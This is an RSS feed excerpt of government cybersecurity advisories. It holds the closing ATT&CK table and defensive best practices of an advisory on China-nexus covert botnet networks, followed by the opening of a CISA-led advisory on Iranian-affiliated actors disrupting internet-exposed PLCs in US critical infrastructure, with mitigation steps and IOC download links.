&lt;p&gt;The &lt;a href=&quot;https://www.ncsc.gov.uk/collection/cyber-assessment-framework&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;NCSC Cyber Assessment Framework&lt;/u&gt;&lt;/a&gt; provides guidance for organizations under the highest levels of threat, including those operating essential services, in sectors such as energy, healthcare, transport, digital infrastructure and government. &amp;nbsp;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;MITRE ATT&amp;amp;CK®&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;This advisory has been compiled with respect to the MITRE ATT&amp;amp;CK® framework, a globally accessible knowledge base of adversary tactics and techniques based on real-world observations.&amp;nbsp;&lt;/p&gt;
&lt;table dir=&quot;ltr&quot; class=&quot;tablesaw tablesaw-stack&quot; data-tablesaw-mode=&quot;stack&quot; data-tablesaw-minimap&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th role=&quot;columnheader&quot; data-tablesaw-priority=&quot;persist&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p class=&quot;text-align-justify&quot;&gt;&lt;strong&gt;Tactic&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p class=&quot;text-align-justify&quot;&gt;&lt;strong&gt;ID&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p class=&quot;text-align-justify&quot;&gt;&lt;strong&gt;Technique&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;th role=&quot;columnheader&quot;&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p class=&quot;text-align-justify&quot;&gt;&lt;strong&gt;Procedure&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Resource Development&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1584/005/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1584.005&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Compromise Infrastructure: Botnet&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Botnets are used as core components of covert networks&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Resource Development&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1584/008/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1584.008&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Compromise Infrastructure: Network Devices&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Devices are compromised and added to botnets&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Resource Development&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1583/003/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1583.003&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Acquire Infrastructure: Virtual Private Server&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Virtual private servers (VPS) are used in covert networks, typically as on-ramps&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;strong&gt;Command and Control&amp;nbsp;&lt;/strong&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;&lt;a href=&quot;https://attack.mitre.org/versions/v18/techniques/T1090/003/&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;T1090.003&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Proxy: Multi-hop Proxy&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;td&gt;
&lt;div class=&quot;TableCellContent SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Used by China-nexus cyber actors to route traffic&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;SCXW242856196 BCX8&quot;&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;h3&gt;&amp;nbsp;&lt;strong&gt;Appendix: Cyber Security Best Practices&amp;nbsp;&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;In addition to the protective advice outlined in this advisory, a number of cyber security best practices will also be useful in defending against the activity described in this advisory.&amp;nbsp;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Protect your devices and networks by keeping them up to date&lt;/strong&gt;: use the latest supported versions, apply security updates promptly, use antivirus and scan regularly to guard against known malware threats. See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/collection/device-security-guidance/policies-and-settings/antivirus-and-other-security-software&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Prevent and detect lateral movement in your organization’s networks&lt;/strong&gt;. See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/preventing-lateral-movement&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/preventing-lateral-movement&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Implement architectural controls for network segregation&lt;/strong&gt;. See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/10-steps-network-security&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/10-steps-network-security&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Set up a security monitoring&lt;/strong&gt; &lt;strong&gt;capability&lt;/strong&gt; so you are collecting the data that will be needed to analyze network intrusions. See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/introduction-logging-security-purposes&lt;/u&gt;&lt;/a&gt; and &lt;a href=&quot;https://www.ncsc.gov.uk/information/logging-made-easy&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/information/logging-made-easy&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Use modern systems and software.&lt;/strong&gt; These have better security built-in. If you cannot move off out-of-date platforms and applications straight away, there are short term steps you can take to improve your position. See NCSC Guidance:&amp;nbsp; &lt;a href=&quot;https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/collection/mobile-device-guidance/managing-the-risks-from-obsolete-products&lt;/u&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Restrict intruders&#039; ability to move freely around your systems and networks&lt;/strong&gt;. Pay particular attention to potentially vulnerable entry points such as third-party systems with onward access to your core network. During an incident, disable remote access from third-party systems until you are sure they are clean. See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/preventing-lateral-movement&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/preventing-lateral-movement&lt;/u&gt;&lt;/a&gt; and &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/assessing-supply-chain-security&lt;/u&gt;&lt;/a&gt;&lt;u&gt;.&lt;/u&gt;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Deploy a host-based intrusion detection system&lt;/strong&gt;. A variety of products are available, free and paid-for, to suit different needs and budgets.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Further information&lt;/strong&gt;: Invest in preventing malware-based attacks across various scenarios.&amp;nbsp; See NCSC Guidance: &lt;a href=&quot;https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;https://www.ncsc.gov.uk/guidance/mitigating-malware-and-ransomware-attacks&lt;/u&gt;&lt;/a&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;Disclaimer&amp;nbsp;&lt;/strong&gt;&amp;nbsp;&lt;/h4&gt;
&lt;p&gt;This report draws on information derived from NCSC and industry sources. Any NCSC findings and recommendations made have not been provided with the intention of avoiding all risks and following the recommendations will not remove all such risk. Ownership of information risks remains with the relevant system owner at all times. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by co-sealers. UK readers should refer to the NCSC website for information about &lt;a href=&quot;https://www.ncsc.gov.uk/section/products-services/assured-services&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;NCSC assured services&lt;/u&gt;&lt;/a&gt;.&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;This information is exempt under the Freedom of Information Act 2000 (FOIA) and may be exempt under other UK information legislation.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;Refer any FOIA queries to &lt;a href=&quot;mailto:ncscinfoleg@ncsc.gov.uk&quot; target=&quot;_blank&quot;&gt;&lt;u&gt;ncscinfoleg@ncsc.gov.uk&lt;/u&gt;&lt;/a&gt;.&amp;nbsp;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;div class=&quot;OutlineElement Ltr SCXW242856196 BCX8&quot;&gt;
&lt;p&gt;All material is UK Crown Copyright ©&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
</description>
  <pubDate>Tue, 21 Apr 2026 11:12:37 EDT</pubDate>
    <dc:creator>CISA</dc:creator>
    <guid isPermaLink="false">/node/24773</guid>
    </item>
<item>
  <title>Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure</title>
  <link>https://www.cisa.gov/news-events/cybersecurity-advisories/aa26-097a</link>
  <description>&lt;h2&gt;&lt;strong&gt;Advisory at a Glance&lt;/strong&gt;&lt;/h2&gt;
&lt;table&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;th&gt;Title&lt;/th&gt;
&lt;td&gt;Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Original Publication&lt;/th&gt;
&lt;td&gt;&lt;strong&gt;April 7, 2026&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Last Update&amp;nbsp;&lt;/th&gt;
&lt;td&gt;&lt;strong&gt;July 22, 2026&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Executive Summary&lt;/th&gt;
&lt;td&gt;The authoring agencies urgently warn U.S. organizations of ongoing Iranian-affiliated cyber targeting of internet-connected operational technology (OT) devices, including programmable logic controllers (PLCs). These actions disrupted PLCs across several U.S. critical infrastructure sectors through malicious project file interactions and manipulation of data on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays, resulting in operational disruption and financial loss.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Last Update Description&lt;/th&gt;
&lt;td&gt;This update adds new guidance on detecting malicious changes in reusable code modules exploited within Rockwell Automation PLC programs. It also expands scope to include observed targeting of Schneider Electric, Siemens, and potentially other branded/manufactured PLCs, emphasizing the importance of restricting direct internet access and providing best practices for secure deployment.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Affected Products&lt;/th&gt;
&lt;td&gt;Potentially all internet exposed PLCs, including Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and other branded/manufactured PLCs.&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Key Actions&lt;/th&gt;
&lt;td&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;Install PLCs consistent with manufacturers&#039; guidelines and security best practices.&lt;/li&gt;
&lt;li&gt;Remove PLCs from direct internet exposure via secure gateway and firewall; work with IT/OT team members and/or integrators to perform this action.&lt;/li&gt;
&lt;li&gt;Query available logs for the provided indicators of compromise (IOCs) and check available logs for suspicious traffic on the ports associated with OT devices, including &lt;code&gt;44818&lt;/code&gt;, &lt;code&gt;2222&lt;/code&gt;, &lt;code&gt;102&lt;/code&gt;, and &lt;code&gt;502&lt;/code&gt;, especially traffic originating from foreign hosting providers.&lt;/li&gt;
&lt;li&gt;For Rockwell Automation devices, place the physical mode switch on the controller into run position. If you suspect your organization was targeted, including against other branded PLC devices, contact the authoring agencies and PLC manufacturer for guidance.&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Indicators of Compromise&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;For a downloadable copy of July 22, 2026&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;IOCs, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.xml&quot;&gt;AA26-097A STIX XML&lt;/a&gt; (July 2026) (29 KB)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.json&quot;&gt;AA26-097A STIX JSON&lt;/a&gt; (July 2026) (30 KB)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a downloadable copy of historical April 7, 2026 IOCs, see:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.xml&quot; title=&quot;AA26-097A STIX XML&quot;&gt;AA26-097A STIX XML&lt;/a&gt; (36 KB)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-04/AA26-097A.stix_.json&quot; title=&quot;AA26-097A STIX JSON&quot;&gt;AA26-097A STIX JSON&lt;/a&gt; (12 KB)&lt;br&gt;&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;th&gt;Intended Audience&lt;/th&gt;
&lt;td&gt;
&lt;p&gt;&lt;strong&gt;Organizations:&lt;/strong&gt; Critical Infrastructure&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Sectors: &lt;/strong&gt;&lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot; title=&quot;Government Services and Facilities&quot;&gt;Government Services and Facilities&lt;/a&gt;, &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot; title=&quot;Water and Wastewater Systems&quot;&gt;Water and Wastewater Systems&lt;/a&gt; (WWS), and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot; title=&quot;Energy&quot;&gt;Energy&lt;/a&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Roles: &lt;/strong&gt;Integrators, asset owners, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/defensive-cybersecurity&quot; title=&quot;Defensive cybersecurity analysts&quot;&gt;defensive cybersecurity analysts&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/operational-technology-ot-cybersecurity-engineering&quot; title=&quot;OT cybersecurity engineers&quot;&gt;OT cybersecurity engineers&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/cybersecurity-architecture&quot; title=&quot;cybersecurity architects&quot;&gt;cybersecurity architects&lt;/a&gt;, &lt;a href=&quot;https://niccs.cisa.gov/tools/nice-framework/work-role/secure-systems-development&quot; title=&quot;secure systems developer&quot;&gt;secure systems developer&lt;/a&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;h2&gt;&lt;strong&gt;Introduction&lt;/strong&gt;&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt;&lt;em&gt; This advisory was originally published on April 7, 2026, to provide tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) related to ongoing cyber exploitation of internet-connected operational technology (OT) devices by&lt;/em&gt; &lt;em&gt;Iranian-affiliated advanced persistent threat (APT) actors. The authoring agencies updated this advisory on July 22, 2026, to add new guidance on detecting malicious changes in reusable code modules leveraged within Rockwell Automation PLC programs. It also expands the manufacturer scope to include observed targeting of Schneider Electric, Siemens, and potentially other branded/manufactured PLCs, emphasizing the importance of restricting direct internet access and providing best practice resources for secure deployment.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), National Security Agency (NSA), Environmental Protection Agency (EPA), Department of Energy (DOE), United States Cyber Command – Cyber National Mission Force (CNMF), and Department of the Treasury (Treasury) (hereafter referred to as the “authoring agencies”) are urgently warning U.S. organizations of ongoing cyber exploitation of internet-connected OT devices—including PLCs manufactured by Rockwell Automation/Allen-Bradley, Schneider Electric, Siemens, and potentially other manufactured PLCs—across multiple U.S. critical infrastructure sectors. As a result of this activity, organizations from multiple U.S. critical infrastructure sectors experienced disruptions through malicious interactions with PLC project files&lt;a href=&quot;#Note1&quot;&gt;&lt;sup&gt;1&lt;/sup&gt;&lt;/a&gt; and the manipulation of data displayed on human machine interface (HMI) and supervisory control and data acquisition (SCADA) displays. In a few cases, this activity caused operational disruption and financial loss.&lt;/p&gt;
&lt;p&gt;The authoring agencies assess a group of Iranian-affiliated APT actors is conducting this activity to cause disruptive effects within the United States. The group targeted devices spanning multiple U.S. critical infrastructure sectors, including &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/government-services-facilities-sector&quot; title=&quot;Government Services and Facilities&quot;&gt;Government Services and Facilities&lt;/a&gt; (to include local municipalities), &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/water-and-wastewater-sector&quot; title=&quot;Water and Wastewater Systems&quot;&gt;Water and Wastewater Systems&lt;/a&gt; (WWS), and &lt;a href=&quot;https://www.cisa.gov/topics/critical-infrastructure-security-and-resilience/critical-infrastructure-sectors/energy-sector&quot; title=&quot;Energy&quot;&gt;Energy&lt;/a&gt; Sectors. The authoring agencies previously reported on similar activity targeting PLCs by &lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a&quot; title=&quot;CyberAv3ngers&quot;&gt;CyberAv3ngers&lt;/a&gt; (aka Shahid Kaveh Group)—a cyber threat actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC) Cyber Electronic Command (CEC).&lt;/p&gt;
&lt;p&gt;Due to the widespread use of these PLCs, and the potential for additional targeting of other branded OT devices across critical infrastructure, the authoring agencies recommend U.S. organizations urgently review the TTPs and IOCs in this advisory for indications of current or historical activity on their networks, and apply the recommendations listed in the &lt;a href=&quot;#Mitigations&quot;&gt;&lt;strong&gt;Mitigations&lt;/strong&gt;&lt;/a&gt; section of this advisory to reduce the risk of compromise.&lt;/p&gt;
&lt;p&gt;If owners and operators discover an affected internet-accessible device in their environment, additional technical measures may be necessary to evaluate the risk of compromise. Please engage your cyber incident response plans and contact the authoring agencies and applicable vendors through existing support channels available to customers and integrators (see &lt;a href=&quot;#Contact&quot;&gt;&lt;strong&gt;Contact Information&lt;/strong&gt;&lt;/a&gt;) to receive support, mitigation, and investigation assistance.&lt;/p&gt;
&lt;p&gt;For more information on Iranian malicious cyber activity, see CISA’s &lt;a href=&quot;https://www.cisa.gov/topics/cyber-threats-and-advisories/advanced-persistent-threats/iran&quot; title=&quot;Iran Cyber Threat Overview and Advisories&quot;&gt;Iran Threat Overview and Advisories&lt;/a&gt; webpage and the FBI’s &lt;a href=&quot;https://www.fbi.gov/investigate/counterintelligence/the-iran-threat&quot; target=&quot;_blank&quot; title=&quot;Iran Threat&quot;&gt;Iran Threat&lt;/a&gt; and Iran &lt;a href=&quot;https://www.fbi.gov/investigate/cyber/cyber-threat-overview-iran&quot; target=&quot;_blank&quot; title=&quot;Iran Cyber Threat&quot;&gt;Cyber Threat Overview&lt;/a&gt; webpages.&lt;/p&gt;
&lt;p&gt;Download the PDF version of this report:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-07/aa26-097a-iranian-affiliated-cyber-actors-exploit-programmable-logic-controllers-across-us-critical-infrastructure_508c.pdf&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;Iranian-Affiliated Cyber Actors Exploit Programmable Logic Controllers Across US Critical Infrastructure&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(PDF,       1.09 MB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;(New, July 22, 2026)&lt;/strong&gt;&lt;/em&gt; For a downloadable copy of July 22, 2026&lt;strong&gt;&amp;nbsp;&lt;/strong&gt;IOCs, see:&lt;/p&gt;
&lt;ul type=&quot;square&quot;&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.xml&quot;&gt;AA26-097A STIX XML&lt;/a&gt; (XML, 29 KB)&lt;/li&gt;
&lt;li&gt;&lt;a href=&quot;https://www.cisa.gov/sites/default/files/2026-07/AA26-097A.stix_.json&quot;&gt;AA26-097A STIX JSON&lt;/a&gt; (JSON, 30 KB)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;For a downloadable copy of historical April 7, 2026 IOCs, see:&lt;/p&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-04/AA26-097A.stix_.xml&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA26-097A.stix_.xml&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(XML,       35.97 KB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;





&lt;div class=&quot;c-file&quot;&gt;
    &lt;div class=&quot;c-file__download&quot;&gt;
    &lt;a href=&quot;/sites/default/files/2026-04/AA26-097A.stix_.json&quot; class=&quot;c-file__link&quot; target=&quot;_blank&quot;&gt;AA26-097A.stix_.json&lt;/a&gt;
    &lt;span class=&quot;c-file__size&quot;&gt;(JSON,       11.87 KB
  )&lt;/span&gt;
  &lt;/div&gt;
&lt;/div&gt;
&lt;h2&gt;&lt;strong&gt;Background Information&lt;/strong&gt;&lt;/h2&gt;
&lt;h3&gt;&lt;strong&gt;Similar Historical Activity Targeting Programmable Logic Controllers&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;During a similar campaign beginning in November 2023, the IRGC CEC-affiliated cyber threat actors known as &quot;CyberAv3ngers” targeted U.S.-based PLCs and HMIs, causing disruptive effects. Private industry and open sources also refer to this group as Hydro Kitten, Storm-0784,&amp;nbsp;APT Iran, Bauxite, Mr. Soul, Soldiers of Solomon, UNC5691,&amp;nbsp;and the Shahid Kaveh Group. These attacks compromised at least 75 devices, targeting U.S.-based Unitronics PLC devices with an HMI used across multiple critical infrastructure sectors, including the WWS. APT actors developed and deployed custom ladder logic code to these devices, replacing the valid ladder logic with malicious code that continues to be observed to date.&lt;/p&gt;
&lt;p&gt;For more information on this group’s activity, see the joint Cybersecurity Advisory&amp;nbsp;&lt;a href=&quot;https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-335a&quot; title=&quot;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&quot;&gt;IRGC-Affiliated Cyber Actors Exploit PLCs in Multiple Sectors, Including US Water and Wastewater Systems Facilities&lt;/a&gt;.&lt;/p&gt;
